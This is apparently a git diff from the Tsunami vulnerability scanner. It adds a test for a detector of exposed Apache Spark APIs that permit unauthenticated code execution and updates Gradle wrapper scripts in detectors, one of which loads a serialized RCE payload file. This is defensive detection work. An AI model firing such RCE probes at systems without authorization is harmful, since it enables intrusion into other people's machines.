com.google.tsunami.plugins.detectors.rce.apachesparksexposedapi; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A {@link PluginBootstrapModule} for {@link ApacheSparksExposedApiVulnDetector}. */ +public final class ApacheSparksExposedApiVulnDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(ApacheSparksExposedApiVulnDetector.class); + } +} diff --git a/community/detectors/rce/apache_spark_exposed_api/src/test/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorTest.java b/community/detectors/rce/apache_spark_exposed_api/src/test/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorTest.java new file mode 100644 index 000000000..df23f6f7d --- /dev/null +++ b/community/detectors/rce/apache_spark_exposed_api/src/test/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetectorTest.java @@ -0,0 +1,175 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.apachesparksexposedapi; + +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.net.MediaType; +import com.google.inject.Guice; +import com.google.protobuf.util.JsonFormat; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.callbackserver.proto.PollingResult; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** tests for {@link ApacheSparksExposedApiVulnDetector}. */ +@RunWith(JUnit4.class) +public final class ApacheSparksExposedApiVulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private ApacheSparksExposedApiVulnDetector detector; + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new ApacheSparksExposedApiVulnDetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws Exception { + mockCallbackServer.shutdown(); + mockWebServer.shutdown(); + } + + @Test + public void detect_ifVulnerable_reportsVuln() throws IOException { + // returning a 200 OK from vulnerable server is enough + mockWebServer.enqueue( + new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setBody(" \"message\" : \"Driver successfully submitted as")); + mockWebServer.start(); + mockWebServer.url(ApacheSparksExposedApiVulnDetector.VULNERABLE_PATH); + // prepare a callbackserver response + PollingResult log = PollingResult.newBuilder().setHasHttpInteraction(true).build(); + String body = JsonFormat.printer().preservingProtoFieldNames().print(log); + mockCallbackServer.enqueue( + new MockResponse() + .setResponseCode(HttpStatus.OK.code()) + .setHeader(CONTENT_TYPE, MediaType.PLAIN_TEXT_UTF_8.toString()) + .setBody(body)); + + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(forHostname(mockWebServer.getHostName())) + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("Apache_Spark_Exposed_Api")) + .setSeverity(Severity.CRITICAL) + .setTitle( + "Exposed Apache Spark API which allows unauthenticated RCE detected.") + .setDescription( + "An exposed Apache Spark API allows an unauthenticated attacker to" + + " submit a malicious task. If an Apache Spark worker processes" + + " such a task, it loads and executes attacker-controlled content" + + " from an external resource. This allows an attacker to execute" + + " arbitrary Java Code within the context of the worker node.") + .setRecommendation( + "Don't expose the Apache Spark API to unauthenticated attackers.")) + .build()); + } + + @Test + public void detect_ifNotVulnerable_doNotReportsVuln() throws IOException { + mockWebServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code())); + mockWebServer.start(); + mockWebServer.url(ApacheSparksExposedApiVulnDetector.VULNERABLE_PATH); + // 404 NOT_FOUND means no valid oob logs for mockCallbackServer + mockCallbackServer.enqueue( + new MockResponse() + .setResponseCode(HttpStatus.NOT_FOUND.code()) + .setHeader(CONTENT_TYPE, MediaType.PLAIN_TEXT_UTF_8.toString())); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build(); + + DetectionReportList detectionReports = + detector.detect( + buildTargetInfo(forHostname(mockWebServer.getHostName())), ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +} diff --git a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/rce/cve202135464/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/rce/cve202135464/gradlew b/community/detectors/rce/cve202135464/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/rce/cve202135464/gradlew +++ b/community/detectors/rce/cve202135464/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/rce/cve202135464/gradlew.bat b/community/detectors/rce/cve202135464/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/rce/cve202135464/gradlew.bat +++ b/community/detectors/rce/cve202135464/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java b/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java index 32e197fc6..7a06d32ef 100644 --- a/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java +++ b/community/detectors/rce/cve202135464/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202135464/Cve202135464Detector.java @@ -18,9 +18,9 @@ import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; import static com.google.tsunami.common.net.http.HttpRequest.get; +import static java.nio.charset.StandardCharsets.UTF_8; import com.google.common.base.Ascii; -import com.google.common.base.Charsets; import com.google.common.base.Stopwatch; import com.google.common.base.Ticker; import com.google.common.collect.ImmutableList; @@ -45,6 +45,7 @@ import com.google.tsunami.proto.Vulnerability; import com.google.tsunami.proto.VulnerabilityId; import java.io.IOException; +import java.nio.charset.StandardCharsets; import java.time.Clock; import java.time.Instant; import javax.inject.Inject; @@ -79,7 +80,7 @@ public final class Cve202135464Detector implements VulnDetector { this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); try { this.serializedBase64RCEPayload = - Resources.toString(Resources.getResource(this.getClass(), "payload.b64"), Charsets.UTF_8); + Resources.toString(Resources.getResource(this.getClass(), "payload.b64"), UTF_8); } catch (IOException e) { logger.atSevere().withCause(e).log( "Should never happen. Couldn't load payload resource file."); diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/spring_cloud_function_cve_2022_22963/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/spring_cloud_function_cve_2022_22963/gradlew +++ b/community/detectors/spring_cloud_function_cve_2022_22963/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ 